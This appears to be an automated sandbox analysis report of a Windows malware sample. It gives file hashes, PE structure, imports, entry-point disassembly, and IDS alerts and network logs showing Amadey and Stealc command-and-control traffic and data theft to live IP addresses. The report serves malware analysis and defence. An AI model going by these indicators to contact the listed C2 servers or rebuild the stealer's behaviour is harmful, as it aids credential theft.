                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\yjzllYsjlU.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):302
                  Entropy (8bit):3.4727155020871523
                  Encrypted:false
                  SSDEEP:6:hCbbXUhXUEZ+lX1CGdKUe6tE9+AQy0lbctwt0:hE4Q1CGAFD9+nVYtwt0
                  MD5:4208AC55BA8945C55BDF725A23B62E14
                  SHA1:30AE84C970CCA74DEDB6B273EC08DA673C54E4EA
                  SHA-256:930EE1372602CCF547AE887D9C35ED5426DD7900D1F84EF328F063624B492305
                  SHA-512:B5911241103B00F08AB735B9A9A3D8FAC5AC5E0F23A939062D9347C14A8079F63327ED18038D5F6120AEAF91D55B6C95E6DC75D69A148E772C26F31C456DDB1C
                  Malicious:false
                  Preview:.....S....O......Q.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................!.@3P.........................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.471265152399308
                  Encrypted:false
                  SSDEEP:6144:CzZfpi6ceLPx9skLmb0fCZWSP3aJG8nAgeiJRMMhA2zX4WABluuNcjDH5S:EZHtCZWOKnMM6bFpWj4
                  MD5:C2AC064DC950947A8E2855EEBAB3DB1A
                  SHA1:A47E0B059C3D5402E0028E9E29ED5EE3036B0ACF
                  SHA-256:D530E631EEBEFD91F7C8AEA5435F14F952C728232C9AFAB4623F67BF251D8687
                  SHA-512:8C186159077EF196864D86B0BC25FCC99EDAD16ADADBD0EAD836946C6ED4140A7872302EC4322A3700C0A89040B19F67BB7D60D24F74FC68643AF2C5A4337603
                  Malicious:false
                  Preview:regfU...U....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...w%...............................................................................................................................................................................................................................................................................................................................................=u.C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.128373889223928
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:yjzllYsjlU.exe
                  File size:429'568 bytes
                  MD5:05b4b94fe502b06454e6fe20b6965c76
                  SHA1:bfa65de4bbea7bf16322882eb0cbb0909efcf0db
                  SHA256:4a5c55ccde112d37cacac44e44b9dea894299902f10a9c6ca4505b145019fdd1
                  SHA512:04fdecb2f567d7268d171b1e4131df618c2c2c6835adee13083d139cc6443d9868f5bd7cbaed1cc020f29c7bc8bf14b763012548c1e8fed152f4dc18083c413a
                  SSDEEP:6144:b09eBWBilriEAtxeSMikAX9cCaQ0POiFNVqjzwFYGONlsah/rOd2A:b0ABN9CxeSMFQ0WiFLqjmONFh/rOdv
                  TLSH:3D94AF4392E17C54E9278732DE2EC6E9371EB9504E29376A3318AE9F24F01B1D163BD1
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........[...[...[...4.O.M...4.z.{...4.N.(...R.w.R...[.......4.K.Z...4.~.Z...4.y.Z...Rich[...........................PE..L......e...
                  Icon Hash:412145494545710d
                  Entrypoint:0x43f933
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x65DE7FE4 [Wed Feb 28 00:35:48 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:bfe1d6ca43e611244ffe6ad8a6fa68ea
                  Instruction
                  call 00007F4C144D0A92h
                  jmp 00007F4C144CD4BEh
                  int3
                  int3
                  int3
                  call 00007F4C144CD66Ch
                  xchg cl, ch
                  jmp 00007F4C144CD654h
                  call 00007F4C144CD663h
                  fxch st(0), st(1)
                  jmp 00007F4C144CD64Bh
                  fabs
                  fld1
                  mov ch, cl
                  xor cl, cl
                  jmp 00007F4C144CD641h
                  mov byte ptr [ebp-00000090h], FFFFFFFEh
                  fabs
                  fxch st(0), st(1)
                  fabs
                  fxch st(0), st(1)
                  fpatan
                  or cl, cl
                  je 00007F4C144CD636h
                  fldpi
                  fsubrp st(1), st(0)
                  or ch, ch
                  je 00007F4C144CD634h
                  fchs
                  ret
                  fabs
                  fld st(0), st(0)
                  fld st(0), st(0)
                  fld1
                  fsubrp st(1), st(0)
                  fxch st(0), st(1)
                  fld1
                  faddp st(1), st(0)
                  fmulp st(1), st(0)
                  ftst
                  wait
                  fstsw word ptr [ebp-000000A0h]
                  wait
                  test byte ptr [ebp-0000009Fh], 00000001h
                  jne 00007F4C144CD637h
                  xor ch, ch
                  fsqrt
                  ret
                  pop eax
                  jmp 00007F4C144CF90Fh
                  fstp st(0)
                  fld tbyte ptr [0040206Ah]
                  ret
                  fstp st(0)
                  or cl, cl
                  je 00007F4C144CD63Dh
                  fstp st(0)
                  fldpi
                  or ch, ch
                  je 00007F4C144CD634h
                  fchs
                  ret
                  fstp st(0)
                  fldz
                  or ch, ch
                  je 00007F4C144CD629h
                  fchs
                  ret
                  fstp st(0)
                  jmp 00007F4C144CF8E5h
                  fstp st(0)
                  mov cl, ch
                  jmp 00007F4C144CD632h
                  call 00007F4C144CD5FEh
                  jmp 00007F4C144CF8F0h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFD30h
                  push ebx
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4b1740x64.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x17cd0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x4b1d80x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x3d1680x18.text
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3d1200x40.text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x4add60x4ae004e3f7b24ee37b11b6c853e9cc2daae20False0.8943062656510852data7.836216550722494IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0x4c0000x370100x5e00c043bc38dd15ddd7deb053063247e8aeFalse0.07205784574468085data0.878579445568721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x840000x17cd00x17e0067bb0f23a6714910c90f16db25c53e05False0.3666046302356021data4.383278874283619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_CURSOR0x96a380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                  RT_CURSOR0x978e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                  RT_CURSOR0x981880x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                  RT_CURSOR0x987200x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                  RT_CURSOR0x988500xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                  RT_CURSOR0x989280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                  RT_CURSOR0x997d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                  RT_CURSOR0x9a0780x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                  RT_ICON0x848a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.36433901918976547
                  RT_ICON0x848a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.36433901918976547
                  RT_ICON0x857480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4526173285198556
                  RT_ICON0x857480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4526173285198556
                  RT_ICON0x85ff00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45910138248847926
                  RT_ICON0x85ff00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45910138248847926
                  RT_ICON0x866b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.45303468208092484
                  RT_ICON0x866b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.45303468208092484
                  RT_ICON0x86c200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2654564315352697
                  RT_ICON0x86c200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2654564315352697
                  RT_ICON0x891c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30651969981238275
                  RT_ICON0x891c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30651969981238275
                  RT_ICON0x8a2700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.35726950354609927
                  RT_ICON0x8a2700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.35726950354609927
                  RT_ICON0x8a7400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5642324093816631
                  RT_ICON0x8a7400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5642324093816631
                  RT_ICON0x8b5e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5424187725631769
                  RT_ICON0x8b5e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5424187725631769
                  RT_ICON0x8be900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6213872832369942
                  RT_ICON0x8be900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6213872832369942
                  RT_ICON0x8c3f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4616182572614108
                  RT_ICON0x8c3f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4616182572614108
                  RT_ICON0x8e9a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4871013133208255
                  RT_ICON0x8e9a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4871013133208255
                  RT_ICON0x8fa480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4918032786885246
                  RT_ICON0x8fa480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4918032786885246
                  RT_ICON0x903d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4530141843971631
                  RT_ICON0x903d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4530141843971631
                  RT_ICON0x908a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.488272921108742
                  RT_ICON0x908a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.488272921108742
                  RT_ICON0x917480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4697653429602888
                  RT_ICON0x917480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4697653429602888
                  RT_ICON0x91ff00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.434971098265896
                  RT_ICON0x91ff00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.434971098265896
                  RT_ICON0x925580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2773858921161826
                  RT_ICON0x925580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2773858921161826
                  RT_ICON0x94b000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2898686679174484
                  RT_ICON0x94b000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2898686679174484
                  RT_ICON0x95ba80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3069672131147541
                  RT_ICON0x95ba80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3069672131147541
                  RT_ICON0x965300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3395390070921986
                  RT_ICON0x965300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3395390070921986
                  RT_STRING0x9a8680x38cdataTamilIndia0.473568281938326
                  RT_STRING0x9a8680x38cdataTamilSri Lanka0.473568281938326
                  RT_STRING0x9abf80x56edataTamilIndia0.44316546762589926
                  RT_STRING0x9abf80x56edataTamilSri Lanka0.44316546762589926
                  RT_STRING0x9b1680x2c6dataTamilIndia0.4732394366197183
                  RT_STRING0x9b1680x2c6dataTamilSri Lanka0.4732394366197183
                  RT_STRING0x9b4300x4a2dataTamilIndia0.448566610455312
                  RT_STRING0x9b4300x4a2dataTamilSri Lanka0.448566610455312
                  RT_STRING0x9b8d80x3f6dataTamilIndia0.4428007889546351
                  RT_STRING0x9b8d80x3f6dataTamilSri Lanka0.4428007889546351
                  RT_ACCELERATOR0x96a000x38dataTamilIndia0.9107142857142857
                  RT_ACCELERATOR0x96a000x38dataTamilSri Lanka0.9107142857142857
                  RT_GROUP_CURSOR0x986f00x30data0.9375
                  RT_GROUP_CURSOR0x989000x22data1.0588235294117647
                  RT_GROUP_CURSOR0x9a5e00x30data0.9375
                  RT_GROUP_ICON0x908380x68dataTamilIndia0.7019230769230769
                  RT_GROUP_ICON0x908380x68dataTamilSri Lanka0.7019230769230769
                  RT_GROUP_ICON0x8a6d80x68dataTamilIndia0.6826923076923077
                  RT_GROUP_ICON0x8a6d80x68dataTamilSri Lanka0.6826923076923077
                  RT_GROUP_ICON0x969980x68dataTamilIndia0.7211538461538461
                  RT_GROUP_ICON0x969980x68dataTamilSri Lanka0.7211538461538461
                  RT_VERSION0x9a6100x258data0.545
                  DLLImport
                  KERNEL32.dllGetLogicalDriveStringsW, SetEnvironmentVariableW, CreateJobObjectW, SetComputerNameW, CreateHardLinkA, GetModuleHandleW, EnumCalendarInfoExW, FindNextVolumeMountPointA, GetNumberFormatA, GetWindowsDirectoryA, GetConsoleAliasExesW, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, GetCalendarInfoW, CreateEventA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetVersionExW, GetFileAttributesA, EnumSystemCodePagesA, GetTimeFormatW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, SetThreadPriority, GetTempPathW, VerifyVersionInfoW, GlobalUnfix, GetStdHandle, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, GetCurrentProcess, CreateNamedPipeA, LoadModule, GlobalFree, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, LocalAlloc, SetCalendarInfoW, FoldStringW, EnumDateFormatsA, GlobalUnWire, GetProcessShutdownParameters, LoadLibraryExA, GetFileTime, WaitForDebugEvent, OpenEventW, GetShortPathNameW, SetFileShortNameA, GetDiskFreeSpaceExW, LCMapStringW, CommConfigDialogW, CreateFileW, GetStringTypeW, MultiByteToWideChar, CloseHandle, WriteConsoleW, FlushFileBuffers, InterlockedDecrement, EnumCalendarInfoW, InterlockedIncrement, SetEndOfFile, TlsGetValue, GetProcAddress, SetDefaultCommConfigA, SetStdHandle, HeapAlloc, EncodePointer, DecodePointer, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, ExitProcess, WriteFile, HeapCreate, Sleep, HeapSize, HeapFree, SetFilePointer, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind
                  USER32.dllGetWindowLongW, SetCaretPos, LoadMenuA, InsertMenuItemW, GetMenu, CharUpperA, CharLowerBuffA, GetSysColor, GetMenuStringA
                  GDI32.dllGetBkMode, GetCharWidthFloatA, CreateDCA, GetCharWidth32W, GetTextCharset, GetCharWidthI
                  WINHTTP.dllWinHttpCloseHandle
                  Language of compilation systemCountry where language is spokenMap
                  TamilIndia
                  TamilSri Lanka
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-25T10:33:11.607701+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649750185.215.113.4380TCP
                  2024-09-25T10:33:21.971959+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.664681185.215.113.10380TCP
                  2024-09-25T10:33:25.592506+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.664680TCP
                  2024-09-25T10:33:26.046162+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:26.265770+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:26.271870+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.3780192.168.2.664682TCP
                  2024-09-25T10:33:26.486604+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:26.493256+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.3780192.168.2.664682TCP
                  2024-09-25T10:33:26.537731+02002856121ETPRO MALWARE Amadey CnC Activity M21192.168.2.664683185.215.113.4380TCP
                  2024-09-25T10:33:27.642684+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:28.070732+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:30.308410+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.664686185.215.113.4380TCP
                  2024-09-25T10:33:32.850576+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:34.611706+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:35.954713+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:37.425841+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:45.085160+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:46.175156+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664682185.215.113.3780TCP
                  2024-09-25T10:33:48.531183+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.664695185.215.113.10380TCP
                  2024-09-25T10:33:53.000344+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.664700185.215.113.3780TCP
                  2024-09-25T10:33:56.102303+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.664705185.215.113.3780TCP
                  2024-09-25T10:34:00.223240+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.664708185.215.113.3780TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 25, 2024 10:33:07.713176966 CEST4974880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:07.717994928 CEST8049748185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:07.718071938 CEST4974880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:07.718255997 CEST4974880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:07.723014116 CEST8049748185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:07.723026991 CEST8049748185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:09.233568907 CEST4974980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:09.238409042 CEST8049749185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:09.240451097 CEST4974980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:09.240581989 CEST4974980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:09.245312929 CEST8049749185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:09.245557070 CEST8049749185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:10.874357939 CEST4975080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:10.879220009 CEST8049750185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:10.879375935 CEST4975080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:10.879509926 CEST4975080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:10.884273052 CEST8049750185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:11.607567072 CEST8049750185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:11.607701063 CEST4975080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.180886984 CEST4975080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.181504011 CEST4975480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.186163902 CEST8049750185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:13.186283112 CEST8049754185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:13.186359882 CEST4975080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.186570883 CEST4975480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.191497087 CEST8049754185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:13.191771030 CEST4975480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.228739023 CEST4975480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:13.233664989 CEST8049754185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:14.860949993 CEST4975580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:14.865737915 CEST8049755185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:14.865883112 CEST4975580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:14.871054888 CEST8049755185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:14.871134996 CEST4975580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:14.871412039 CEST4975580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:14.871539116 CEST4975580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:14.876153946 CEST8049755185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:14.876462936 CEST8049755185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:16.374500036 CEST4975680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:16.379463911 CEST8049756185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:16.379607916 CEST4975680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:16.379920006 CEST4975680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:16.384749889 CEST8049756185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:16.384860039 CEST8049756185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:16.384933949 CEST4975680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:16.384933949 CEST4975680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:16.389760017 CEST8049756185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:16.389784098 CEST8049756185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:18.014931917 CEST6467980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:18.020380974 CEST8064679185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:18.020462990 CEST6467980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:18.020944118 CEST6467980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:18.026981115 CEST8064679185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:18.732594013 CEST8064679185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:18.732707977 CEST6467980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:20.250899076 CEST6467980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:20.251137972 CEST6468080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:20.540375948 CEST8064680185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:20.540493965 CEST6468080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:20.540565014 CEST8064679185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:20.540625095 CEST6467980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:20.540873051 CEST6468080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:20.545811892 CEST8064680185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:21.253525972 CEST8064680185.215.113.43192.168.2.6
                  Sep 25, 2024 10:33:21.253664970 CEST6468080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:33:21.258011103 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.262948036 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.263068914 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.263263941 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.268085003 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.971822023 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.971889019 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.971939087 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.971959114 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.971973896 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.971990108 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972009897 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.972034931 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972045898 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.972060919 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972079992 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.972094059 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972115040 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.972119093 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972148895 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.972170115 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972186089 CEST8064681185.215.113.103192.168.2.6
                  Sep 25, 2024 10:33:21.972187996 CEST6468180192.168.2.6185.215.113.103
                  Sep 25, 2024 10:33:21.972233057 CEST6468180192.168.2.6185.215.113.103
